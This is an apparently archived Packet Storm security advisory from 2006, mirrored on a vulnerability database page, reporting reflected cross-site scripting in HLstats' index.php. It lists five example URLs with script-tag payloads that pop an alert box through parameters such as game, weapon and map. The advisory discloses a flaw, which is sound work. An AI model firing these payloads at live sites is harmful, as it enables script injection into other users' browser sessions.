Lucene search

K

hlstats.txt

๐Ÿ—“๏ธย 01 Sep 2006ย 00:00:00Reported byย MC IgloTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 21ย Views

Input sanitization vulnerability in HLstats.ph

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Hello, world ;)  
  
Input passed to multiple parameters in index.php isn't properly  
sanitised before being returned to the user. This can be exploited to  
execute HTML and script code in a user's browser session in context of  
an affected site with limitation of ' and ".  
This may also affect prior versions.  
  
Examples:  
http://[host]/index.php?mode=players&game=%3Cscript%3Ealert(123)%3C/script%3E  
http://[host]/index.php?mode=weaponinfo&weapon=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc  
http://[host]/index.php?mode=search&q=whatever&st=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc  
http://[host]/index.php?mode=actioninfo&action=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc  
http://[host]/index.php?mode=mapinfo&map=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc  
  
(instead of 'tfc' you should use the game, HLstats is configurated for)  
  
kind regards  
MC.Iglo  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Sep 2006 00:00Current
7.4High risk
Vulners AI Score7.4
21
.json
Report